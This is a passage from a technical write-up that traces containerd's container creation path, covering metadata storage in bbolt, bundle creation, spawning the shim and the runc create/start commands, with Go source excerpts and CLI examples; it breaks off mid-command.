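<p>To see how such a struct maps onto the JSON config, the sketch below serializes a tiny spec. The JSON keys follow the OCI runtime spec (<code class="language-plaintext highlighter-rouge">process.capabilities.bounding</code> and so on), but the struct types are local stand-ins and <code class="language-plaintext highlighter-rouge">defaultCaps()</code> returns only an illustrative subset rather than the full default capability list.</p>

```go
package main

import (
	"encoding/json"
	"fmt"
)

// Local stand-ins for the spec types, reduced to the capability fields.
type capabilities struct {
	Bounding  []string `json:"bounding,omitempty"`
	Permitted []string `json:"permitted,omitempty"`
	Effective []string `json:"effective,omitempty"`
}

type process struct {
	Capabilities *capabilities `json:"capabilities,omitempty"`
}

type spec struct {
	Process *process `json:"process,omitempty"`
}

// defaultCaps returns an illustrative subset (an assumption), not the
// complete default list.
func defaultCaps() []string {
	return []string{"CAP_CHOWN", "CAP_KILL"}
}

// defaultSpec fills all three capability sets from the same defaults.
func defaultSpec() spec {
	return spec{
		Process: &process{
			Capabilities: &capabilities{
				Bounding:  defaultCaps(),
				Permitted: defaultCaps(),
				Effective: defaultCaps(),
			},
		},
	}
}

// render serializes the spec as indented JSON.
func render(s spec) (string, error) {
	b, err := json.MarshalIndent(s, "", "  ")
	if err != nil {
		return "", err
	}
	return string(b), nil
}

func main() {
	out, err := render(defaultSpec())
	if err != nil {
		panic(err)
	}
	fmt.Println(out)
}
```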

<h4 id="122-save-container-metadata-into-db">1.2.2. Save Container Metadata into DB</h4>

<p>The <code class="language-plaintext highlighter-rouge">ReplaceContainer()</code> call is internally turned into a <code class="language-plaintext highlighter-rouge">"/containerd.services.containers.v1.Containers/Create"</code> gRPC request and sent to <code class="language-plaintext highlighter-rouge">containerd</code> [1].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/internal/libcontainerd/replace.go</span>
<span class="k">func</span> <span class="n">ReplaceContainer</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">client</span> <span class="n">types</span><span class="o">.</span><span class="n">Client</span><span class="p">,</span> <span class="n">id</span> <span class="kt">string</span><span class="p">,</span> <span class="n">spec</span> <span class="o">*</span><span class="n">specs</span><span class="o">.</span><span class="n">Spec</span><span class="p">,</span> <span class="n">shim</span> <span class="kt">string</span><span class="p">,</span> <span class="n">runtimeOptions</span> <span class="n">any</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">containerd</span><span class="o">.</span><span class="n">NewContainerOpts</span><span class="p">)</span> <span class="p">(</span><span class="n">types</span><span class="o">.</span><span class="n">Container</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">newContainer</span> <span class="o">:=</span> <span class="k">func</span><span class="p">()</span> <span class="p">(</span><span class="n">types</span><span class="o">.</span><span class="n">Container</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">client</span><span class="o">.</span><span class="n">NewContainer</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">id</span><span class="p">,</span> <span class="n">spec</span><span class="p">,</span> <span class="n">shim</span><span class="p">,</span> <span class="n">runtimeOptions</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span>
    <span class="p">}</span>
    <span class="n">ctr</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">newContainer</span><span class="p">()</span> <span class="c">// &lt;--------</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/containerd/api/services/containers/v1/containers_grpc.pb.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">containersClient</span><span class="p">)</span> <span class="n">Create</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">in</span> <span class="o">*</span><span class="n">CreateContainerRequest</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">grpc</span><span class="o">.</span><span class="n">CallOption</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">CreateContainerResponse</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">out</span> <span class="o">:=</span> <span class="nb">new</span><span class="p">(</span><span class="n">CreateContainerResponse</span><span class="p">)</span>
    <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">cc</span><span class="o">.</span><span class="n">Invoke</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="s">"/containerd.services.containers.v1.Containers/Create"</span><span class="p">,</span> <span class="n">in</span><span class="p">,</span> <span class="n">out</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span> <span class="c">// [1]</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>On the <code class="language-plaintext highlighter-rouge">containerd</code> side, <code class="language-plaintext highlighter-rouge">_Containers_Create_Handler()</code> dispatches the request to <code class="language-plaintext highlighter-rouge">Create()</code>, which saves the container object into the boltdb (<code class="language-plaintext highlighter-rouge">/var/lib/containerd/io.containerd.metadata.v1.bolt/meta.db</code>) [2].</p>

<p><a href="https://github.com/etcd-io/bbolt"><code class="language-plaintext highlighter-rouge">bbolt</code></a> is an embedded key/value database for Go, and here it is used as a metadata store by <code class="language-plaintext highlighter-rouge">containerd</code>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// api/services/containers/v1/containers_grpc.pb.go</span>
<span class="k">func</span> <span class="n">_Containers_Create_Handler</span><span class="p">(</span><span class="n">srv</span> <span class="k">interface</span><span class="p">{},</span> <span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">dec</span> <span class="k">func</span><span class="p">(</span><span class="k">interface</span><span class="p">{})</span> <span class="kt">error</span><span class="p">,</span> <span class="n">interceptor</span> <span class="n">grpc</span><span class="o">.</span><span class="n">UnaryServerInterceptor</span><span class="p">)</span> <span class="p">(</span><span class="k">interface</span><span class="p">{},</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">info</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">grpc</span><span class="o">.</span><span class="n">UnaryServerInfo</span><span class="p">{</span>
        <span class="n">Server</span><span class="o">:</span>     <span class="n">srv</span><span class="p">,</span>
        <span class="n">FullMethod</span><span class="o">:</span> <span class="s">"/containerd.services.containers.v1.Containers/Create"</span><span class="p">,</span>
    <span class="p">}</span>
    <span class="n">handler</span> <span class="o">:=</span> <span class="k">func</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">req</span> <span class="k">interface</span><span class="p">{})</span> <span class="p">(</span><span class="k">interface</span><span class="p">{},</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">srv</span><span class="o">.</span><span class="p">(</span><span class="n">ContainersServer</span><span class="p">)</span><span class="o">.</span><span class="n">Create</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">req</span><span class="o">.</span><span class="p">(</span><span class="o">*</span><span class="n">CreateContainerRequest</span><span class="p">))</span> <span class="c">// &lt;--------</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// plugins/services/containers/local.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">l</span> <span class="o">*</span><span class="n">local</span><span class="p">)</span> <span class="n">Create</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">req</span> <span class="o">*</span><span class="n">api</span><span class="o">.</span><span class="n">CreateContainerRequest</span><span class="p">,</span> <span class="n">_</span> <span class="o">...</span><span class="n">grpc</span><span class="o">.</span><span class="n">CallOption</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">api</span><span class="o">.</span><span class="n">CreateContainerResponse</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">l</span><span class="o">.</span><span class="n">withStoreUpdate</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="k">func</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span> <span class="c">// [2]</span>
        <span class="n">container</span> <span class="o">:=</span> <span class="n">containerFromProto</span><span class="p">(</span><span class="n">req</span><span class="o">.</span><span class="n">Container</span><span class="p">)</span>
        <span class="c">// [...]</span>
        <span class="n">created</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">l</span><span class="o">.</span><span class="n">Store</span><span class="o">.</span><span class="n">Create</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">container</span><span class="p">)</span>
        <span class="n">resp</span><span class="o">.</span><span class="n">Container</span> <span class="o">=</span> <span class="n">containerToProto</span><span class="p">(</span><span class="o">&amp;</span><span class="n">created</span><span class="p">)</span>
        <span class="c">// [...]</span>
        <span class="k">return</span> <span class="no">nil</span>
    <span class="p">})</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The container object here is different from <code class="language-plaintext highlighter-rouge">dockerd</code>’s. <code class="language-plaintext highlighter-rouge">containerd</code>’s container object is a <strong>runtime metadata record</strong> (ID, Runtime, Snapshotter, Image, Spec, Labels, …), and the two objects are persisted independently in different stores.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// core/containers/containers.go</span>
<span class="k">type</span> <span class="n">Container</span> <span class="k">struct</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">Spec</span> <span class="n">typeurl</span><span class="o">.</span><span class="n">Any</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>If you are interested in what the DB entry looks like, you can first install the <code class="language-plaintext highlighter-rouge">bbolt</code> CLI:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>go <span class="nb">install </span>go.etcd.io/bbolt/cmd/bbolt@latest
</code></pre></div></div>

<p>It allows you to view the entry content from <code class="language-plaintext highlighter-rouge">meta.db</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># [Check database file integrity]</span>
bbolt check meta.db
<span class="c">## Response: OK</span>

<span class="c"># [List the bucket]</span>
bbolt buckets meta.db
<span class="c">## Response: v1</span>

<span class="c"># [List and get keys]</span>
bbolt keys meta.db v1
<span class="c">## Response:</span>
<span class="c">##  moby</span>
<span class="c">##  moby_history</span>
<span class="c">##  version</span>
<span class="c">##</span>
<span class="c">## PS. moby and moby_history are sub-buckets</span>

bbolt keys meta.db v1 moby containers
<span class="c">## Response:</span>
<span class="c">##  db58127f96bd2c5655eb53f516ba7efeafac3c7335c5f2389e2b8a329e034b11</span>

bbolt get meta.db v1 moby containers db58127f96bd2c5655eb53f516ba7efeafac3c7335c5f2389e2b8a329e034b11 spec
<span class="c">## Response:</span>
<span class="c">##  0a3674797065732e636f6e7461...(long hex value)</span>
<span class="c">## decoded: .. "ociVersion":"1.3.0","process":{"terminal":true,"consoleSize":{"height":50,"width":212}, ...</span>
</code></pre></div></div>
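
<p>To make the hex dump a little less opaque, here is a minimal sketch that decodes only the prefix shown above. It assumes the stored <code class="language-plaintext highlighter-rouge">spec</code> value is a serialized protobuf <code class="language-plaintext highlighter-rouge">Any</code> message (matching the <code class="language-plaintext highlighter-rouge">typeurl.Any</code> field) and that the tag and the length each fit in one byte. <code class="language-plaintext highlighter-rouge">decodeAnyPrefix()</code> and <code class="language-plaintext highlighter-rouge">anyPrefix</code> are hypothetical names, not part of <code class="language-plaintext highlighter-rouge">bbolt</code> or <code class="language-plaintext highlighter-rouge">containerd</code>.</p>

```go
package main

import (
	"encoding/hex"
	"fmt"
)

// anyPrefix describes what the leading bytes of a serialized protobuf Any
// reveal: the first field's number and wire type, the declared length of the
// type URL, and the part of the URL present in the (truncated) input.
type anyPrefix struct {
	FieldNumber int
	WireType    int
	URLLength   int
	URLPrefix   string
}

// decodeAnyPrefix is a hypothetical helper for illustration only.
// Assumption: the tag and the length are single-byte varints.
func decodeAnyPrefix(hexStr string) (anyPrefix, error) {
	raw, err := hex.DecodeString(hexStr)
	if err != nil {
		return anyPrefix{}, err
	}
	if 2 > len(raw) {
		return anyPrefix{}, fmt.Errorf("need at least 2 bytes, got %d", len(raw))
	}
	return anyPrefix{
		FieldNumber: int(raw[0]) / 8, // upper bits of the tag byte
		WireType:    int(raw[0]) % 8, // lower three bits; 2 means length-delimited
		URLLength:   int(raw[1]),
		URLPrefix:   string(raw[2:]),
	}, nil
}

func main() {
	// Only the hex prefix shown in the CLI output; the rest is elided there.
	p, err := decodeAnyPrefix("0a3674797065732e636f6e7461")
	if err != nil {
		fmt.Println("decode failed:", err)
		return
	}
	fmt.Printf("field=%d wire=%d url_len=%d url_prefix=%q\n",
		p.FieldNumber, p.WireType, p.URLLength, p.URLPrefix)
	// Prints: field=1 wire=2 url_len=54 url_prefix="types.conta"
}
```

<p>Field 1 of <code class="language-plaintext highlighter-rouge">Any</code> is the type URL, so the value appears to start with a 54-byte type URL beginning with <code class="language-plaintext highlighter-rouge">types.conta</code>, followed by the payload that contains the OCI spec JSON seen in the decoded line.</p>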

<h4 id="123-create-bundle--spawn-shim-daemon">1.2.3. Create Bundle &amp; Spawn shim Daemon</h4>

<p><code class="language-plaintext highlighter-rouge">ctr.NewTask()</code> ends up as a <code class="language-plaintext highlighter-rouge">"/containerd.services.tasks.v1.Tasks/Create"</code> request to <code class="language-plaintext highlighter-rouge">containerd</code>.</p>

<p>The handler <code class="language-plaintext highlighter-rouge">Create()</code> first gets the container object from the boltdb <code class="language-plaintext highlighter-rouge">meta.db</code> [1] and sets up the create options [2]. Finally, <code class="language-plaintext highlighter-rouge">rtime.Create()</code> is called with these options [3].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// plugins/services/tasks/local.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">l</span> <span class="o">*</span><span class="n">local</span><span class="p">)</span> <span class="n">Create</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">api</span><span class="o">.</span><span class="n">CreateTaskRequest</span><span class="p">,</span> <span class="n">_</span> <span class="o">...</span><span class="n">grpc</span><span class="o">.</span><span class="n">CallOption</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">api</span><span class="o">.</span><span class="n">CreateTaskResponse</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">container</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">l</span><span class="o">.</span><span class="n">getContainer</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">ContainerID</span><span class="p">)</span> <span class="c">// [1]</span>
    <span class="c">// [...]</span>
    <span class="n">opts</span> <span class="o">:=</span> <span class="n">runtime</span><span class="o">.</span><span class="n">CreateOpts</span><span class="p">{</span> <span class="c">// [2]</span>
        <span class="n">Spec</span><span class="o">:</span> <span class="n">container</span><span class="o">.</span><span class="n">Spec</span><span class="p">,</span>
        <span class="n">IO</span><span class="o">:</span> <span class="n">runtime</span><span class="o">.</span><span class="n">IO</span><span class="p">{</span>
            <span class="n">Stdin</span><span class="o">:</span>    <span class="n">r</span><span class="o">.</span><span class="n">Stdin</span><span class="p">,</span>
            <span class="n">Stdout</span><span class="o">:</span>   <span class="n">r</span><span class="o">.</span><span class="n">Stdout</span><span class="p">,</span>
            <span class="n">Stderr</span><span class="o">:</span>   <span class="n">r</span><span class="o">.</span><span class="n">Stderr</span><span class="p">,</span>
            <span class="n">Terminal</span><span class="o">:</span> <span class="n">r</span><span class="o">.</span><span class="n">Terminal</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="c">// [...]</span>
        <span class="n">Runtime</span><span class="o">:</span>         <span class="n">container</span><span class="o">.</span><span class="n">Runtime</span><span class="o">.</span><span class="n">Name</span><span class="p">,</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="n">rtime</span> <span class="o">:=</span> <span class="n">l</span><span class="o">.</span><span class="n">v2Runtime</span>
    <span class="n">c</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">rtime</span><span class="o">.</span><span class="n">Create</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">ContainerID</span><span class="p">,</span> <span class="n">opts</span><span class="p">)</span> <span class="c">// [3]</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Inside <code class="language-plaintext highlighter-rouge">rtime.Create()</code>, <code class="language-plaintext highlighter-rouge">NewBundle()</code> is called to create the runtime container directories and files [4]. Later, <code class="language-plaintext highlighter-rouge">m.manager.Start()</code> [5] spawns a <code class="language-plaintext highlighter-rouge">containerd-shim-runc-v2</code> process as the container shim daemon. Finally, <code class="language-plaintext highlighter-rouge">shimTask.Create()</code> sends a <code class="language-plaintext highlighter-rouge">CreateTaskRequest</code> to the shim daemon [6], which in turn executes the command <code class="language-plaintext highlighter-rouge">runc create --bundle &lt;bundle_dir&gt;</code>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// core/runtime/v2/task_manager.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">m</span> <span class="o">*</span><span class="n">TaskManager</span><span class="p">)</span> <span class="n">Create</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">taskID</span> <span class="kt">string</span><span class="p">,</span> <span class="n">opts</span> <span class="n">runtime</span><span class="o">.</span><span class="n">CreateOpts</span><span class="p">)</span> <span class="p">(</span><span class="n">_</span> <span class="n">runtime</span><span class="o">.</span><span class="n">Task</span><span class="p">,</span> <span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">bundle</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">NewBundle</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">m</span><span class="o">.</span><span class="n">root</span><span class="p">,</span> <span class="n">m</span><span class="o">.</span><span class="n">state</span><span class="p">,</span> <span class="n">taskID</span><span class="p">,</span> <span class="n">opts</span><span class="o">.</span><span class="n">Spec</span><span class="p">)</span> <span class="c">// [4]</span>
    <span class="n">shim</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">m</span><span class="o">.</span><span class="n">manager</span><span class="o">.</span><span class="n">Start</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">taskID</span><span class="p">,</span> <span class="n">bundle</span><span class="p">,</span> <span class="n">opts</span><span class="p">)</span> <span class="c">// [5]</span>
    <span class="n">shimTask</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">newShimTask</span><span class="p">(</span><span class="n">shim</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="n">t</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="k">func</span><span class="p">()</span> <span class="p">(</span><span class="n">runtime</span><span class="o">.</span><span class="n">Task</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">t</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">shimTask</span><span class="o">.</span><span class="n">Create</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">opts</span><span class="p">)</span> <span class="c">// [6]</span>
        <span class="c">// [...]</span>
    <span class="p">}()</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The OCI config file is created in <code class="language-plaintext highlighter-rouge">NewBundle()</code> with the path <code class="language-plaintext highlighter-rouge">"/run/containerd/io.containerd.runtime.v2.task/&lt;namespace&gt;/&lt;id&gt;/config.json"</code> [7].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// core/runtime/v2/bundle.go</span>
<span class="k">func</span> <span class="n">NewBundle</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">root</span><span class="p">,</span> <span class="n">state</span><span class="p">,</span> <span class="n">id</span> <span class="kt">string</span><span class="p">,</span> <span class="n">spec</span> <span class="n">typeurl</span><span class="o">.</span><span class="n">Any</span><span class="p">)</span> <span class="p">(</span><span class="n">b</span> <span class="o">*</span><span class="n">Bundle</span><span class="p">,</span> <span class="n">err</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">ns</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">namespaces</span><span class="o">.</span><span class="n">NamespaceRequired</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span> <span class="c">// ns == "moby"</span>
    <span class="n">b</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">Bundle</span><span class="p">{</span>
        <span class="n">ID</span><span class="o">:</span>        <span class="n">id</span><span class="p">,</span>
        <span class="n">Path</span><span class="o">:</span>      <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">state</span><span class="p">,</span> <span class="n">ns</span><span class="p">,</span> <span class="n">id</span><span class="p">),</span> <span class="c">// state == "/run/containerd/io.containerd.runtime.v2.task/"</span>
                                                 <span class="c">// id == "&lt;container id&gt;"</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">spec</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="k">if</span> <span class="n">spec</span> <span class="o">:=</span> <span class="n">spec</span><span class="o">.</span><span class="n">GetValue</span><span class="p">();</span> <span class="n">spec</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
            <span class="c">// [...]</span>
            <span class="n">specPath</span> <span class="o">:=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">b</span><span class="o">.</span><span class="n">Path</span><span class="p">,</span> <span class="n">oci</span><span class="o">.</span><span class="n">ConfigFilename</span><span class="p">)</span>
            <span class="n">err</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">WriteFile</span><span class="p">(</span><span class="n">specPath</span><span class="p">,</span> <span class="n">spec</span><span class="p">,</span> <span class="m">0666</span><span class="p">)</span> <span class="c">// [7]</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The actual command for spawning a shim process looks like:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/usr/bin/containerd-shim-runc-v2 <span class="se">\</span>
<span class="nt">-namespace</span> moby <span class="se">\</span>
<span class="nt">-address</span> /run/containerd/containerd.sock <span class="se">\</span>
<span class="nt">-publish-binary</span> /usr/bin/containerd <span class="se">\</span>
<span class="nt">-id</span> 636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5 <span class="se">\</span>
start
</code></pre></div></div>

<p>The command that the shim daemon executes to create a container takes two groups of arguments: the global options (before <code class="language-plaintext highlighter-rouge">create</code>) and the sub-command options (after <code class="language-plaintext highlighter-rouge">create</code>).</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/usr/bin/runc <span class="se">\</span>
<span class="nt">--root</span> /var/run/docker/runtime-runc/moby <span class="se">\</span>
<span class="nt">--log</span> /run/containerd/io.containerd.runtime.v2.task/moby/636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5/log.json <span class="se">\</span>
<span class="nt">--log-format</span> json <span class="se">\</span>
<span class="nt">--systemd-cgroup</span> <span class="se">\</span>
create <span class="se">\</span>
<span class="nt">--bundle</span> /run/containerd/io.containerd.runtime.v2.task/moby/636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5 <span class="se">\</span>
<span class="nt">--pid-file</span> /run/containerd/io.containerd.runtime.v2.task/moby/636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5/init.pid <span class="se">\</span>
636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5
</code></pre></div></div>
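
<p>When reading such command lines from process listings or logs, it can help to split them mechanically. A minimal sketch, assuming the sub-command name does not also appear as the value of a global option; <code class="language-plaintext highlighter-rouge">splitArgs()</code> is a hypothetical helper, and <code class="language-plaintext highlighter-rouge">BUNDLE_DIR</code> and <code class="language-plaintext highlighter-rouge">CONTAINER_ID</code> are placeholders for the long values shown above.</p>

```go
package main

import "fmt"

// splitArgs is a hypothetical helper: it splits argv (without the binary
// name) at the first occurrence of sub and reports whether sub was found.
func splitArgs(argv []string, sub string) (global, rest []string, found bool) {
	for i, a := range argv {
		if a == sub {
			return argv[:i], argv[i+1:], true
		}
	}
	return argv, nil, false
}

func main() {
	argv := []string{
		"--root", "/var/run/docker/runtime-runc/moby",
		"--log-format", "json",
		"--systemd-cgroup",
		"create",
		"--bundle", "BUNDLE_DIR", // placeholder for the bundle path
		"CONTAINER_ID", // placeholder for the container ID
	}
	global, rest, ok := splitArgs(argv, "create")
	if !ok {
		fmt.Println("no sub-command found")
		return
	}
	fmt.Println("global:", global)
	fmt.Println("create:", rest)
}
```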

<h4 id="124-enter-the-container">1.2.4. Enter the Container</h4>

<p>In the final step, <code class="language-plaintext highlighter-rouge">tsk.Start()</code> is called to send a <code class="language-plaintext highlighter-rouge">"/containerd.services.tasks.v1.Tasks/Start"</code> request to <code class="language-plaintext highlighter-rouge">containerd</code>, whose handler is <code class="language-plaintext highlighter-rouge">Start()</code> in <code class="language-plaintext highlighter-rouge">local.go</code>.</p>

<p>This function first looks up the task created in the previous step [1] and then sends a <code class="language-plaintext highlighter-rouge">StartRequest</code> to the shim daemon to start the container [2].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// plugins/services/tasks/local.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">l</span> <span class="o">*</span><span class="n">local</span><span class="p">)</span> <span class="n">Start</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">api</span><span class="o">.</span><span class="n">StartRequest</span><span class="p">,</span> <span class="n">_</span> <span class="o">...</span><span class="n">grpc</span><span class="o">.</span><span class="n">CallOption</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">api</span><span class="o">.</span><span class="n">StartResponse</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">t</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">l</span><span class="o">.</span><span class="n">getTask</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">ContainerID</span><span class="p">)</span> <span class="c">// [1]</span>
    <span class="c">// [...]</span>
    <span class="n">p</span> <span class="o">:=</span> <span class="n">runtime</span><span class="o">.</span><span class="n">Process</span><span class="p">(</span><span class="n">t</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">p</span><span class="o">.</span><span class="n">Start</span><span class="p">(</span><span class="n">ctx</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// &lt;--------</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// core/runtime/v2/shim.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">shimTask</span><span class="p">)</span> <span class="n">Start</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">_</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">s</span><span class="o">.</span><span class="n">task</span><span class="o">.</span><span class="n">Start</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">task</span><span class="o">.</span><span class="n">StartRequest</span><span class="p">{</span> <span class="c">// [2]</span>
        <span class="n">ID</span><span class="o">:</span> <span class="n">s</span><span class="o">.</span><span class="n">ID</span><span class="p">(),</span>
    <span class="p">})</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>On the shim daemon side, the command <code class="language-plaintext highlighter-rouge">runc start &lt;id&gt;</code> is executed to unblock the init process that <code class="language-plaintext highlighter-rouge">runc create</code> left parked just before <code class="language-plaintext highlighter-rouge">execve()</code>.</p>

<p>The actual command line looks like:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/usr/bin/runc <span class="se">\</span>
<span class="nt">--root</span> /var/run/docker/runtime-runc/moby <span class="se">\</span>
<span class="nt">--log</span> /run/containerd/io.containerd.runtime.v2.task/moby/636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5/log.json <span class="se">\</span>
